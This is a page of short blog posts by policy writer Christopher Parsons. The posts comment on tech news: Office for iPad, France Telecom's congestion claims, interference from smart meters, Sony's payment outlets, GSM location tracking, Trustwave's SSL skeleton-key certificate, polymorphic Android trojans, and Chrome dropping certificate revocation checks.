Author: Christopher Parsons

Policy wonk. Torontonian. Photographer. Not necessarily in that order.

Categories
Links Writing

parislemon: What If… (Office For iPad Edition)

parislemon:

Watching the back-and-forth yesterday about the whole Microsoft Office for iPad thing was nothing if not amusing. The basic rundown:

It’s coming, here it is.” “That’s not it.” “Yes it is.” “No it’s not, but we didn’t say it’s not coming.” “A Microsoft employee showed it to us.” “No…

MG has an interesting analysis on what Office for iPad might mean. I have to admit, if MS partners with Apple to bring real office software to the iPad then another sword will be levied at Google’s throat. I still – as a professional writer – despise using Google Docs for anything but the most minimal tasks: it just doesn’t meet my requirements for ‘real’ word processing.

The takeaway? Office would add to the ‘professional’ status of the iPad without taking away from the iPad’s ‘consumer friendly’ branding. This would further exacerbate the issues that Google’s tablets face while simultaneously challenging RIM’s own advertising that the PlayBook is ‘the’ tablet for professionals. It would definitely be a coup for both companies against their competitors, and so well worth watching for.

Categories
Links Writing

Want to Claim Congestion? Then Expect Real Audits

Free is a really interesting new mobile carrier in France, which offers a cheap entry rate of service. It seems as though the incumbent they’re partnered with wasn’t expecting Free’s success and so they want to raise rates on the basis of congestion. Specifically,

France Telecom said its network was being stressed by a rapid growth in traffic brought on by its hosting of new mobile entrant Iliad and vowed to protect its clients from service interruptions, its CEO told magazine Le Point…Iliad’s Free Mobile service upended the French telecom market in January when it launched its main offer at 19.99 euros per month for unlimited calls to France and most of Europe and the United States, unlimited texts, and 3 gigabytes of mobile data.

It’s entirely possible that the network is stressed … but it’s equally possible that other issues are leading to stresses that are real or imagined. If incumbents get to call congestion whenever the market turns against them, then they should be subjected to real, honest to god, tests for congestion by engineers who are (at best) neutral. Ideally the engineers should be downright hostile in order to force the incumbent to demonstrate beyond a shadow of a doubt that the network is indeed strained, and that such strains aren’t the result of poor management, investment, or technical configuration.

If it turns out that the incumbent is responsible then they should pay for the audit and be required to meet contractual service demands that were offered to partners and be prohibited from engaging in predatory pricing in the future. Congestion is now a particularly tired big-bad-wolf, and it’s time that ISPs that call wolf are actually forced to demonstrate, in peer-reviewable empirical terms, that the wolf is actually at the doorsteps or ravaging the sheep.

Categories
Links

Wireless Interference and Smart Meters?

Apparently folks in the DSLReports Forums are reporting some issues with their new smart meters:

Users in our forums direct our attention to claims that at least one small WISP has had their service put out of commission due to electric utility smart meters operating in the 900 MHz band. We’ve previously noted how utility smart meters are interfering with residential Wi-Fi routers, and we’re seeing agrowing number of complaints about the meters interfering with other residential gear as well. The solution from utilities so far appears to be the hope that all consumers migrated to 2.4GHZ and 5.8 GHZ bands so they don’t have to change. However, some smart meters also use the 2.4 GHz range.

I hadn’t really considered interference as one of the issues with smart meters – most of my time has been spent looking at the privacy, payment, and security issues that these meters have exhibited over the past decade – but I guess I shouldn’t be surprised. If consumers are being forced to adopt the next-gen electrical surveillance kit I have to wonder: can at least negotiate for a free router to go with their electrical update?

Categories
Links

Sony’s Smartgrid Micropayment System

Sony is promoting a product concept: smart electric outlets that enable micro payments and authentication for energy usage at the device level. As described by The Verge:

Sony is developing power outlet technology that uses IC chips to determine a user’s identity or permissions. Possible use case scenarios include managing energy usage in large buildings, device theft prevention, and — yes — the potential for paid access to power. Sony says it expects the technology to be employed in cafes, restaurants, airport waiting lounges, and other public places. The outlets have an IC chip built-in, and send authentication information down the power line itself — this can come from an IC chip built into the plug, or potentially inside an NFC-equipped device or payment card.

This isn’t a surprising new concept – contemporary ‘smart systems’ are largely sold on these kinds of logic – but it’s telling that we would be moving payment and identity authentication into integrated ICs on the devices that we use in daily life. I’ll be incredibly curious to see the threat models and risk assessments associated with these next-generation smart systems: if they are deployed as imagined, payment security and electrical privacy issues would be incredibly serious, and challenging, issues to adequately address.

Categories
Links

Tracking by GSM

From Ars Technica:

The attack works by exploiting features in GSM, or Global System for Mobile Communications, cellular networks that transmit data sent between base stations and phones in clear text. By simply calling the target’s mobile number and monitoring the network’s radio signals as it locates the phone, the attacker can quickly confirm if the person is located in what’s known as the LAC, or Location Area Code. Attackers can use the same technique to determine if the target is within close proximity to a given base station within the LAC.

This is helpful for figuring out where, in a specific geographic area, a person is or (in case you’re interested) where they aren’t. This latter use – clarifying that a person isn’t in a specific LAC – is particularly useful if you are launching some action that is made easier by a person’s non-presence. (Hint: Think burglary).

This new GSM attack builds on other research around monitoring a person’s location by exploiting mobile phones. For a good overview of the information used in similar kinds of surveillance, see Claudio A. Ardagna et als. chapter in Digital Privacy: Theory, Technologies, and Practices.

Categories
Links Writing

SSL Skeleton Keys

From the Ars lede:

Critics are calling for the ouster of Trustwave as a trusted issuer of secure sockets layer certificates after it admitted minting a credential it knew would be used by a customer to impersonate websites it didn’t own.

The so-called subordinate root certificate allowed the customer to issue SSL credentials that Internet Explorer and other major browsers would accept as valid for any server on the Internet. The unnamed buyer of this skeleton key used it to perform what amounted to man-in-the-middle attacks that monitored users of its internal network as they accessed SSL-encrypted websites and services. The data-loss-prevention system used a hardware security module to ensure the private key at the heart of the root certificate wasn’t accidentally leaked or retrieved by hackers.

It’s not new that these keys are issued – and, in fact, governments are strongly believed to compel such keys from authorities in their jurisdiction – but the significance of these keys cannot be overstated. SSL is intended to encourage trust: if you see that a site is using SSL then that site is supposed to be ‘safe’. This is the lesson that the Internet industry has been pounding into end-users/consumers for ages. eCommerce largely depends on consumers ‘getting’ this message.

The problem is that the lesson is increasingly untrue.

Given the sale of ‘skeleton key’ certs, the hacking of authorities to generate (illegitimate) certs for major websites (e.g. addons.mozilla.com, hotmail.com, gmail.com, etc), and widespread backend problems with SSL implementation, it is practically impossible to claim the SSL makes things ‘safe’. While SSL isn’t in the domain of security theatre, it can only be seen as marginally increasing protection instead of making individuals, and their online transactions, safe.

This is significant for the end-user/consumer, because they psychologically respond to the difference between ‘safe’ and ‘safer’. Ideally a next-generation, peer-reviewable and trust agile, system will be formally adopted by the major players in the near future. Only after the existing problems around SSL are worked out – through trust agility, certificate pinning, and so forth – will the user experience be moved back towards the ‘safe’ position in the ‘safe/unsafe’ continuum.

Categories
Writing

Stupid Problem with BlackBerry Data

I use my mobile phones a lot and most batteries just barely last me through a day on a single charge. With my iPhone and Windows Phone, when the batteries are almost exhausted, various functions (including radios) are disabled to make the last bit of juice last as long as possible. My BlackBerry does the same thing.

I’m fine with this.

What’s I’m not fine with is the following: once I charge the BlackBerry and the radios are re-activated, I have to pull the battery and fully reboot the device to get access to the various services that course through the BIS. If I don’t pull the battery, I get a warning that my plan doesn’t cover data services and thus I cannot access the phone’s various Internet-related functions. On the face of things, it seems that after charging the device, RIM’s software fails to indicate to their network infrastructure that I have a data plan and thus can access the BIS.

Needless to say, this is absurd.

I cannot believe that I’m the only person running into this and regardless of whether the problem is with my particular carrier, or the device, it isn’t something that I should ever experience. These are the kinds of problems that should be sorted out well before a device is put in the consumer’s hands.

Categories
Aside Links

Self-Mutating Trojans Come to Android

Symantec is warning that the next generation of smartphone viruses has come:

Researchers from security vendor Symantec Corp. have identified a new premium-rate SMS Android Trojan horse that modifies its code every time it gets downloaded in order to bypass antivirus detection.

This technique is known as server-side polymorphism and has already existed in the world of desktop malware for many years, but mobile malware creators have only now begun to adopt it.

A special mechanism that runs on the distribution server modifies certain parts of the Trojan in order to ensure that every malicious app that gets downloaded is unique. This is different from local polymorphism where the malware modifies its own code every time it gets executed.

This is a clever means to avoid the rudimentary analysis systems that the major vendors use to ID malware. It’s also (another) indication of how important antivirus is going to become for the mobile marketplaces. I suspect that, by the end of the year, a lot of users (on iOS, Android, and the rest) are going to wish that the post-Steve Jobs smartphones on the market today met Jobs’ initial thoughts regarding smartphones when Apple released the iPhone. Specifically, he held that:

He didn’t want outsiders to create applications for the iPhone that could mess it up, infect it with viruses, or pollute its integrity

While our pocket computers are better now that apps are available, I can’t help but think that Jobs’ earliest worries are now looming at today’s potential nightmares.

Categories
Videos

Fixing SSL, Moxie-Style

A follow up to my last post; if you want insight into how to fix the cruft that is SSL, take the time to watch Moxie’s presentation on SSL and The Future of Authenticity.

Categories
Links

Chrome Kills CA Revocation Checks

From Ars:

“While the benefits of online revocation checking are hard to find, the costs are clear: online revocation checks are slow and compromise privacy,” Langley added. That’s because the checks add a median time of 300 milliseconds and a mean of almost 1 second to page loads, making many websites reluctant to use SSL. Marlinspike and others have also complained that the services allow certificate authorities to compile logs of user IP addresses and the sites they visit over time.

Chrome will instead rely on its automatic update mechanism to maintain a list of certificates that have been revoked for security reasons. Langley called on certificate authorities to provide a list of revoked certificates that Google bots can automatically fetch. The time frame for the Chrome changes to go into effect are “on the order of months,” a Google spokesman said.

The problems with CA revocation checks have been particularly prominent over the past 12 months, given the large number of serious CA breaches. While even the Google fetch mechanism isn’t ideal – really, we need to move to an agile trust framework combined (ideally) with browser pinning that can’t be compromised by corporate admins – it’s better. Still, there’s a long way to go until SSL and the CA system are reformed to the point of being actual ‘trusted’ facets of the Internet.